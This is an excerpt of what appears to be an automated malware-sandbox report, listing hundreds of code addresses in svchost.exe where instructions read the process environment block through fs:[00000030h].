Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]	2_2_038663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]	2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]	2_2_0382C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]	2_2_03850310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]	2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]	2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]	2_2_038D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390634F mov eax, dword ptr fs:[00000030h]	2_2_0390634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]	2_2_038D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]	2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]	2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]	2_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]	2_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h]	2_2_039062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]	2_2_0382823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]	2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]	2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390625D mov eax, dword ptr fs:[00000030h]	2_2_0390625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]	2_2_0382A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]	2_2_03836259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]	2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]	2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]	2_2_0382826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]	2_2_03870185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]	2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]	2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]	2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]	2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]	2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]	2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]	2_2_039061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]	2_2_038601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]	2_2_038F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]	2_2_03860124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]	2_2_0382C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]	2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]	2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]	2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]	2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]	2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]	2_2_0383208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h]	2_2_038280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]	2_2_038C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]	2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]	2_2_038B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0382A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]	2_2_038380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]	2_2_038B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0382C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]	2_2_038720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]	2_2_038B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]	2_2_0382A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]	2_2_0382C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]	2_2_038C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]	2_2_03832050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]	2_2_038B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]	2_2_0385C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]	2_2_038D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]	2_2_038307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]	2_2_038E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]	2_2_038B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_038BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]	2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]	2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]	2_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]	2_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]	2_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]	2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]	2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]	2_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]	2_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]	2_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]	2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]	2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]	2_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]	2_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]	2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]	2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]	2_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]	2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]	2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]	2_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]	2_2_03872619
